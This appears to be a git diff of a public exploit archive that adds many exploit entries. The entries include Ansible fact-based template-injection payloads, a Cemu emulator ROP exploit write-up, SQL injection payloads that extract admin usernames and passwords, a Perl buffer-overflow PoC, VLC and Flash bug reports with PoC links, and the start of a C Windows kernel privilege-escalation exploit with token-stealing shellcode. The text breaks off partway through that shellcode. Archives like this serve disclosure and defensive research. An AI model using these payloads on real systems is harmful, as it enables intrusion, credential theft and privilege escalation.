# [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L146
# [4] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/__init__.py#L678
Bypass #4: Template injection by changing jinja syntax
------------------------------------------------------
Remote facts always get quoted. Set_fact unquotes them by evaluating them.
UnsafeProxy was designed to defend against unquoting by transforming jinja
syntax into jinja comments, effectively disabling injection.
Bypass the filtering of "{{" and "{%" by changing the jinja syntax [1][2]. The
{{}} is needed to make it look like a variable [3]. This works against:
- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}
data['ansible_facts'].update({
'exploit_set_fact': True,
'ansible_os_family': "#jinja2:variable_start_string:'[[',variable_end_string:']]',block_start_string:'[%',block_end_string:'%]'\n{{}}\n[[ansible_host]][[lookup('pipe', '" + PAYLOAD + "')]]",
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L66
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L469
# [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L308
Bypass #5: Template injection in dict keys
------------------------------------------
Strings and lists are properly cleaned up, but dictionary keys are not [1]. This
works against:
- set_fact: foo="some prefix {{ansible_os_family}} and/or suffix"
- command: echo "{{foo}}
The prefix and/or suffix are needed in order to turn the
dict into a string, otherwise the value would remain a dict.
data['ansible_facts'].update({
'exploit_set_fact': True,
'ansible_os_family': { "{{ %s }}" % LOOKUP: ''},
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/vars/unsafe_proxy.py#L104
Bypass #6: Template injection using safe_eval
---------------------------------------------
There's a special case for evaluating strings that look like a list or dict [1].
Strings that begin with "{" or "[" are evaluated by safe_eval [2]. This allows
us to bypass the removal of jinja syntax [3]: we use the whitelisted Python to
re-create a bit of Jinja template that is interpreted.
This works against:
- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}
data['ansible_facts'].update({
'exploit_set_fact': True,
'ansible_os_family': """[ '{'*2 + "%s" + '}'*2 ]""" % LOOKUP,
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L334
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/safe_eval.py
# [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L229
Issue: Disabling verbosity
--------------------------
Verbosity can be set on the controller to get more debugging information. This
verbosity is controlled through a custom fact. A host however can overwrite this
fact and set the verbosity level to 0, hiding exploitation attempts.
data['_ansible_verbose_override'] = 0
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/callback/default.py#L99
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/callback/default.py#L208
Issue: Overwriting files
------------------------
Roles usually contain custom facts that are defined in defaults/main.yml,
intending to be overwritten by the inventory (with group and host vars). These
facts can be overwritten by the remote host, due to the variable precedence [1].
Some of these facts may be used to specify the location of a file that will be
copied to the remote host. The attacker may change it to /etc/passwd. The
opposite is also true, he may be able to overwrite files on the Controller. One
example is the usage of a password lookup with where the filename contains a
variable [2].
[1] http://docs.ansible.com/ansible/playbooks_variables.html#variable-precedence-where-should-i-put-a-variable
[2] http://docs.ansible.com/ansible/playbooks_lookups.html#the-password-lookup
Mitigation
----------
Computest is not aware of mitigations short of installing fixed versions of the
software.
Resolution
----------
Ansible has released new versions that fix the vulnerabilities described in
this advisory: version 2.1.4 for the 2.1 branch and 2.2.1 for the 2.2 branch.
Conclusion
----------
The handling of Facts in Ansible suffers from too many special cases that allow
for the bypassing of filtering. We found these issues in just hours of code
review, which can be interpreted as a sign of very poor security. However, we
don't believe this is the case.
The attack surface of the Controller is very small, as it consists mainly of the
Facts. We believe that it is very well possible to solve the filtering and
quoting of Facts in a sound way, and that when this has been done, the
opportunity for attack in this threat model is very small.
Furthermore, the Ansible security team has been understanding and professional
in their communication around this issue, which is a good sign for the handling
of future issues.
Timeline
--------
2016-12-08 First contact with Ansible security team
2016-12-09 First contact with Redhat security team (secalert@redhat.com)
2016-12-09 Submitted PoC and description to security@ansible.com
2016-12-13 Ansible confirms issue and severity
2016-12-15 Ansible informs us of intent to disclose after holidays
2017-01-05 Ansible informs us of disclosure date and fix versions
2017-01-09 Ansible issues fixed version

65
platforms/multiple/dos/41008.txt Executable file
View file

@ -0,0 +1,65 @@
Source: https://cosig.gouv.qc.ca/en/cosig-2017-01-en/
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 24.0.0.186 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: January 10, 2017
# CVE-2017-2930
# COSIG-2016-35
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created
on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio.
Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia
and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
============================
2) Rapport de Coordination
============================
2016-11-13: Francis Provencher of COSIG report this vulnerability to Adobe PSIRT;
2016-11-14: Adobe PSIRT confirm this vulnerability;
2017-01-10: Adobe publish a patch (APSB17-02);
2017-01-10: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, an attacker is able to create an “out of bound” memory corruption. A file with an “ActionRecord”
structure that contain an invalid value in “ActionGetURL2” could lead to remote code execution in the context of the current user.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41008.zip
####################################################################################

65
platforms/multiple/dos/41012.txt Executable file
View file

@ -0,0 +1,65 @@
Source: https://cosig.gouv.qc.ca/en/cosig-2017-01-en/
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 24.0.0.186 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: January 10, 2017
# CVE-2017-2930
# COSIG-2016-35
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created
on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio.
Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia
and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
============================
2) Rapport de Coordination
============================
2016-11-13: Francis Provencher of COSIG report this vulnerability to Adobe PSIRT;
2016-11-14: Adobe PSIRT confirm this vulnerability;
2017-01-10: Adobe publish a patch (APSB17-02);
2017-01-10: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, an attacker is able to create an “out of bound” memory corruption. A file with an “ActionRecord”
structure that contain an invalid value in “ActionGetURL2” could lead to remote code execution in the context of the current user.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41012.zip
####################################################################################

69
platforms/multiple/local/41021.txt Executable file
View file

@ -0,0 +1,69 @@
For those who only care about one thing: [the PoC is here.](https://rol.im/kpwned.zip)
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41021.zip
## Overview
Cemu is a closed-source Wii U emulator developed by Exzap. New versions are released to those who donate to him via his Patreon first, then to the public one week later. According to its official website, Cemu "is not intended for general use yet", however it can run some games well.
It HLEs the Wii U OS APIs. For those who don't know, the Wii U runs executables in a modified ELF format that include additional PE-like import and export sections. Basically, the HLE here means each exported function from each shared library has been reimplemented, and runs in native code. That's a pretty large attack surface! So, when looking for bugs, I decided to start there.
## Finding bugs in Cemu HLE API emulation
Obviously, the first thing to do is to find where the API exports are set up so all of them can be annotated in IDA. I found a function at `0x1400AEDC0` (before relocation, cemu.exe is compiled with ASLR) that I labeled `set_up_emulated_API`. It takes three arguments: a pointer to a hashed (or obfuscated) shared library name, a pointer to a hashed (or obfuscated) exported function name, and a pointer to the function used for implementation. This function has a nice debug `printf` where it printed out the library name and exported function name, so I did things the long way and set a breakpoint there in x64dbg and labeled all the ~620(!) functions by hand. This took the better part of a day (however I did take breaks.)
Once I had all the functions labeled, I could go ahead and start looking for bugs. It was nice from my perspective that the emulated API functions did all the grunt work of endianness conversion of arguments and return values, so I didn't have to do anything of the sort myself. I first decided to check the more interestingly (for me) named functions, not long later I'd found a bug.
### sysapp!_SYSGetSystemApplicationTitleId
```c
uint64_t _SYSGetSystemApplicationTitleId(uint32_t index);
```
The implementation of this function just sets up a large array of title IDs (a title ID is a 64 bit integer that identifies "something that runs on the console", like a system application, firmware component or game, this has been used by Nintendo since the Wii and DSi, on console and handheld respectively) on the stack, then indexes it using the provided argument **without checking** and returns the array[index] to the emulator. What a perfect infoleak, to defeat ASLR later!
Exploiting this seems easy, just get the return address from the stack (index `37`), but it seems this isn't totally reliable, so instead I make a dummy call, then use index `52`, which seems to return an address inside the `cemu.exe` `.text` more reliably.
### padscore!KPADSetConnectCallback
```c
uint32_t KPADSetConnectCallback(uint32_t index,uint32_t value)
```
With an infoleak obtained, I just needed to find some (semi-)arbitrary write, and this took annoyingly longer to find. I found a few bugs that seemed promising but ultimately turned out to be unexploitable. Finally, after checking some of the functions not related to the OS, I found this function. Basically, it writes to an array of 32-bit integers (obviously the intended use of that array is function pointers inside the emulated system), in the `.data` section, with no checking of the provided index. Even better, it returns the old value (although I never needed to use this functionality when exploiting).
The array is unfortunately near the end of `.data`, but that doesn't really matter, as it's stored *before* a nice array of KPAD C++ objects with vtables that I can clobber -- and if a pointer inside one of the objects happens to not be NULL, this same function makes a vtable call twice! Even better!
## Exploitation
My PoC clobbers the first KPAD object (player 1 gamepad): it nulls out the checked pointer so no vtable calls are made while things are being overwritten, it overwrites the vtable pointers, sets up the ROP chain, sets up the stack pivot, makes that pointer non-NULL, and makes a dummy call to `KPADSetConnectCallback` to get ROP.
Heh, I just made that sound easy. It wasn't.
Let's see, it was annoying to find a stack pivot in the first place? But then I found the perfect pair of gadgets:
```
0x000000014015d404 : add rcx, 0x10 ; jmp qword ptr [rax]
0x0000000140228371 : push rcx ; pop rsp ; ret
```
When the first one gets called, `rcx` has the address of the vtable array, and `rax` has the address of the first element of the vtable array (which isn't actually used, so it's a perfect place to put a gadget address).
The ROP chain is written using `KPADSetConnectCallback` just like everything else, all this is written into a part of memory that contains UTF-16LE strings for controller mappings, that can only be seen if you open the controller settings. The ROP chain itself just grabs the address of the shellcode inside emulated RAM, `memcpy`s it to RWX memory allocated for the dynamic recompiler, and jumps there. Sure, it doesn't work if you deliberately disable the dynamic recompiler, but firstly, who even does that?!, and secondly, I'll leave the making of a ROP chain that uses `VirtualAlloc` to someone else if they wish.
The shellcode itself is just metasploit `windows/x64/exec` running `calc.exe`. Nothing special.
One final thing: when testing, I noticed that the emulator crashed if controller one was set up properly. It's because I initially thought the pointer that got checked for being NULL was a boolean or something else, and I'd only zeroed out the lower 32 bits of it. Whoops.
## Compiling the PoC
Linked at the top of the page is an archive including the PoC itself as `calc.rpx` plus source plus modified and additional import library dependencies (as source and binaries). I used [wut](https://github.com/decaf-emu/wut) to make the PoC which obviously depends on [devkitPro/devkitPPC](http://devkitpro.org/). After compiling wut successfully I had to make library additions, as both of the vulnerable functions were not included in the library set. Luckily enough it was very easy to make additions to the import libraries.
## Timeline
2016-12-30: started reversing
2016-12-31: found exploits
2017-01-01: made PoC, made initial contact with developer
2017-01-02: developer replies, said fixes have been made
2017-01-02: asked for release date
2017-01-02: reply: release date unknown, "in 1-2 weeks maybe"
2017-01-09: release to patrons, public disclosure

3
platforms/php/webapps/27110.txt
View file

@ -4,5 +4,4 @@ Eggblog is prone to multiple input validation vulnerabilities. These issues are
Successful exploitation of these vulnerabilities could result in a compromise of the application, disclosure or modification of data, the theft of cookie-based authentication credentials. They may also permit an attacker to exploit vulnerabilities in the underlying database implementation. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.
http://www.example.com/eggblog/home/blog.php?id=
70'% 20union%20select% 201,2,3,4,5, 6,7/*
http://www.example.com/eggblog/home/blog.php?id=70'% 20union%20select% 201,2,3,4,5, 6,7/*

1
platforms/php/webapps/40999.txt
View file

@ -3,7 +3,6 @@
# Google Dork: My Php Dating
# Date:09.01.2017
# Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm
# Tested on: http://www.phponlinedatingsoftware.com/demo/
# Script Name: My Php Dating
# Script Version: 2.0
# Script Buy Now: http://www.phponlinedatingsoftware.com/order.htm

1
platforms/php/webapps/41007.html
View file

@ -3,7 +3,6 @@
# Google Dork: FMyLife Clone Script
# Date:10.01.2017
# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm
# Tested on: http://www.tellaboutit.com/admin/
# Script Name: FMyLife Clone Script (Pro Edition)
# Script Version: 1.1
# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/

39
platforms/php/webapps/41009.txt Executable file
View file

@ -0,0 +1,39 @@
# Exploit Title: Starting Page 1.3 "Add a Link" - SQL Injection
# Date: 11-01-2017
# Software Link: http://software.friendsinwar.com/downloads.php?cat_id=2&download_id=11<http://software.friendsinwar.com/downloads.php?cat_id=2&download_id=11>
# Exploit Author: Ben Lee
# Contact: benlee9@outlook.com
# Category: webapps
# Tested on: Win7
1. Description
The vulnerable file is "link_req_2.php",all the post parameters do not get filtered,then do sql query。
2. Vulnerable parameters:
'$_POST[category]','$_POST[name]','$_POST[url]','$_POST[description]','$_POST[email]'
3.Proof of Concept:
Url:http://www.example.com/StartingPage/link_req_2.php
Post data:
[category=1' AND (select 1 from(select count(*),concat((select(select(select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e)from sp_admin limit 0,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND 'a'='a&name=abc&email=admin@admin.com&url=www.xxx.com&description=helloworld]
[cid:4be0cc87-4612-4096-ad49-cc18d8cb4033]
Best Regards!
Ben Lee

14
platforms/php/webapps/41010.txt Executable file
View file

@ -0,0 +1,14 @@
# Vulnerability: My link trader - SQL Injection
# Date: 11.01.2017
# Vendor Homepage:
http://software.friendsinwar.com/scripts_example/my_link_trader/
# Tested on: Kali Linux 2016.2
# Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawid.morawski1990@gmail.com
#########################
#########################
# SQL Injection/POC :
# Vulnerable Parametre : id
# http://localhost/[PATH]/out.php?id=[SQL]

21
platforms/php/webapps/41023.txt Executable file
View file

@ -0,0 +1,21 @@
# # # # #
# Vulnerability: Travel Portal Script v9.33 - SQL Injection Web Vulnerability
# Google Dork: Travel Portal Script
# Date:11.01.2017
# Vendor Homepage: http://itechscripts.com/travel-portal-script/
# Script Name: Travel Portal Script
# Script Version: v9.33
# Script Buy Now: http://itechscripts.com/travel-portal-script/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
#
# SQL Injection/Exploit :
# http://localhost/[PATH]/pages.php?id=[SQL]
# http://localhost/[PATH]/hotel.php?hid=[SQL]
# http://localhost/[PATH]/holiday.php?hid=[SQL]
# E.t.c.... Other files, too. There are security vulnerabilities.
# Category,User E.t.c.. Add/Edit/Delete There are security vulnerabilities.
#
# # # # #

19
platforms/php/webapps/41024.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Vulnerability: Movie Portal Script v7.35 - SQL Injection Web Vulnerability
# Google Dork: Movie Portal Script
# Date:11.01.2017
# Vendor Homepage: http://itechscripts.com/movie-portal-script/
# Script Name: Movie Portal Script
# Script Version: v7.35
# Script Buy Now: http://itechscripts.com/movie-portal-script/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
#
# SQL Injection/Exploit :
# http://localhost/[PATH]/artist.php?a=[SQL]
# http://localhost/[PATH]/movie.php?f=[SQL]
# E.t.c.... Other files, too. There are security vulnerabilities.
# Category,User E.t.c.. Add/Edit/Delete There are security vulnerabilities.
# # # # #

18
platforms/php/webapps/41027.txt Executable file
View file

@ -0,0 +1,18 @@
# Vulnerability: Dating Script v3.25 - SQL Injection
# Date: 11.01.2017
# Software link: http://itechscripts.com/dating-script/
# Demo: http://dating.itechscripts.com
# Price: 199$
# Category: webapps
# Exploit Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawid.morawski1990@gmail.com
#######################################
1. Description
An attacker can exploit this vulnerability to read from the database.
2. SQL Injection / Proof of Concept:
Vulnerable Parametre: id
http://localhost/[PATH]/see_more_details.php?id=[SQL]

204
platforms/windows/dos/41018.txt Executable file
View file

@ -0,0 +1,204 @@
Document Title:
===============
Boxoft Wav v1.1.0.0 - Buffer Overflow Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2027
Release Date:
=============
2017-01-09
Vulnerability Laboratory ID (VL-ID):
====================================
2027
Common Vulnerability Scoring System:
====================================
5.8
Product & Service Introduction:
===============================
Boxoft Wav to MP3 Converter is an 100% free powerful audio conversion tool that lets you to batch convert WAV file to high
quality MP3 audio formats, It is equipped with a standard audio compressed encoder, you can select bitrate settings and
convert multiple files at once. Another convenience feature is hot directory (Watch Folder to convert Audio); it can be
converted to mp3 format automatically when the source wav files are written to a specified monitored directory.
(Copy of the Vendor Homepage: http://www.boxoft.com/wav-to-mp3/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local buffer overflow vulnerability in the official Boxoft Wav to MP3 v1.1.0.0 software.
Vulnerability Disclosure Timeline:
==================================
2017-01-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Boxoft
Product: Wav to MP3 - Player (Software) 1.1.0.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in the official Boxoft Wav to MP3 (freeware) V1.1.0.0 software.
The local vulnerability allows local attackers to overwrite the registers to compromise the local software system process.
The classic unicode buffer overflow vulnerability is located in the `Add` function of the `Play` module. Local attackers are
able to load special crafted files that overwrites the eip register to compromise the local system process of the software.
An attacker can manipulate thebit EIP register to execute the next instruction of their choice. Attackers are able to execute
arbitrary code with the privileges of the software process. Local attackers can exploit the issue by an include of a 18kb unicode
payload as txt file to add for the play module.
The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 5.8.
Exploitation of the vulnerability requires a low privilege or restricted system user account without user interaction.
Successful exploitation of the vulnerability results in computer system manipulation and compromise of the computer system.
Proof of Concept (PoC):
=======================
The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Download and install the "setup(free-wav-to-mp3)" file
2. Run the poc code via active perl or perl
3. A file format "poc.txt" will be created
4. Click "ADD" and upload the (poc.txt)
Name > POC.txt
Size > 18KB
Full file name : C:UsersDellDesktopPoc.txt
5. Click "Play"
Note: Software will crash with an unhandled exception and critical access violation
6. Successful reproduce of the local buffer overflow vulnerability!
PoC: Exploitation (Perl)
#!/usr/bin/perl
my $Buff = "x41" x 9000;
open(MYFILE,'>>poc.txt');
print MYFILE $Buff;
close(MYFILE);
print "SaifAllah benMassaoud";
--- Debug Logs [WinDBG] ---
(1d10.1d3c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=31347831 edx=7769660d esi=00000000 edi=00000000
eip=31347831 esp=0012f70c ebp=0012f72c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
31347831 ?? ???
0012f720: ntdll!RtlRaiseStatus+c8 (7769660d)
0012faf4: 31347831
Invalid exception stack at 34783134
0:000> d 0012faf4
0012faf4 34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34 41x41x41x41x41x4
0012fb04 31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31 1x41x41x41x41x41
0012fb14 78 34 31 78 34 31 78 34-31 78 34 31 78 34 31 78 x41x41x41x41x41x
0012fb24 34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34 41x41x41x41x41x4
0012fb34 31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31 1x41x41x41x41x41
0012fb44 78 34 31 78 34 31 78 34-31 78 34 31 78 34 31 78 x41x41x41x41x41x
0012fb54 34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34 41x41x41x41x41x4
0012fb64 31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31 1x41x41x41x41x41
0:000>kb
Following frames may be wrong.
0012f708 776965f9 0012f7f4 0012faf4 0012f810 0x31347831
0012f72c 776965cb 0012f7f4 0012faf4 0012f810 ntdll!RtlRaiseStatus+0xb4
0012f7dc 77696457 0012f7f4 0012f810 0012f7f4 ntdll!RtlRaiseStatus+0x86
0012f7e0 0012f7f4 0012f810 0012f7f4 0012f810 ntdll!KiUserExceptionDispatcher+0xf
0012f7e4 0012f810 0012f7f4 0012f810 c0000005 0x12f7f4
0012f7f4 00000000 00000000 78313478 00000002 0x12f810
--- [CRASH - wavtomp3.exe] ---
Problem Event Name: APPCRASH
Application Name: wavtomp3.exe
Application Version: 1.1.0.0
Application Timestamp: 2a425e19
Fault Module Name: StackHash_e98d
Fault Module Version: 0.0.0.0
Fault Module Timestamp: 00000000
Exception Code: c0000005
Exception Offset: 31347831
OS Version: 6.1.7600.2.0.0.256.1
Locale ID: 1033
Additional Information 1: e98d
Additional Information 2: e98dfca8bcf81bc1740adb135579ad53
Additional Information 3: 6eab
Additional Information 4: 6eabdd9e0dc94904be3b39a1c0583635
Note: The access violation with the exception and followup offsets shows that the ecx & eip was overwritten.
Security Risk:
==============
The security risk of the local buffer overflow vulnerability in the Boxoft Wav to MP3 software is estimated as high. (CVSS 5.8)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - SaifAllah benMassaoud (http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

25
platforms/windows/dos/41025.txt Executable file
View file

@ -0,0 +1,25 @@
In modules/codec/adpcm.c, VLC can be made to perform an out-of-bounds
write with user-controlled input.
The function DecodeAdpcmImaQT at adpcm.c:595 allocates a buffer which
is filled with bytes from the input stream. However, it does not check
that the number of channels in the input stream is less than or equal
to the size of the buffer, resulting in an out-of-bounds write. The
number of channels is clamped at <= 5.
adpcm_ima_wav_channel_t channel[2];
...
for( i_ch = 0; i_ch < p_dec->fmt_in.audio.i_channels; i_ch++ )
{
channel[i_ch].i_predictor = (int16_t)((( ( p_buffer[0] << 1 )|(
p_buffer[1] >> 7 ) ))<<7);
channel[i_ch].i_step_index = p_buffer[1]&0x7f;
...
The mangling of the input p_buffer above and in
AdpcmImaWavExpandNibble() makes this difficult to exploit, but there
is a potential for remote code execution via a malicious media file.
POC:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41025.mov

820
platforms/windows/local/41015.c Executable file
View file

@ -0,0 +1,820 @@
/*
Source: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html
Binary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41015.exe
*/
// ricklarabee.blogspot.com
//This program is free software; you can redistribute it and/or
//modify it under the terms of the GNU General Public License
//as published by the Free Software Foundation.
//This program is distributed in the hope that it will be useful,
//but WITHOUT ANY WARRANTY; without even the implied warranty of
//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
//GNU General Public License for more details.
//You should have received a copy of the GNU General Public License
//along with this program; if not, write to the Free Software
//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255
// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255
#include <windows.h>
#include <wchar.h>
#include <stdlib.h>
#include <stdio.h>
#pragma comment(lib,"ntdll.lib")
#pragma comment(lib,"user32.lib")
#pragma comment(lib, "advapi32")
UINT64 PML4_BASE;
UINT PML4_SELF_REF_INDEX;
UINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)
#define GET_INDEX(va) ( ((va >> 39) & 0x1ff ))
////////////////////////////////////////////////////////
// Define Data Types
////////////////////////////////////////////////////////
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
typedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,
OUT PULONG Interval);
NtQuerySystemInformation_t NtQuerySystemInformation;
NtQueryIntervalProfile_t NtQueryIntervalProfile;
char shellcode[] = {
//0xcc,
0xfa, // CLI
0x9c, // PUSHFQ
0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer
0x50, // PUSH RAX
0x51, // PUSH RCX
0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset]
0x48, 0x89, 0x01, // MOV QWORD PTR [RCX], RAX
0xb9, 0x90, 0x90, 0x90, 0x90, // MOV ECX, PID
0x53, // PUSH RBX
0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188
0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS
0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset]
//<tag>
0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]
